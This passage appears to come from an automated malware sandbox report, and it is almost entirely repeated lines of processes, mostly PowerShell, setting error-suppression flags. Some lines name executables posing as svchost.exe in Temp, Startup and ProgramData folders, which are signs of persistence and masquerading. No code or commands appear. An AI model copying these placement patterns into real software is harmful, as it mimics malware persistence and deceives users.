        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
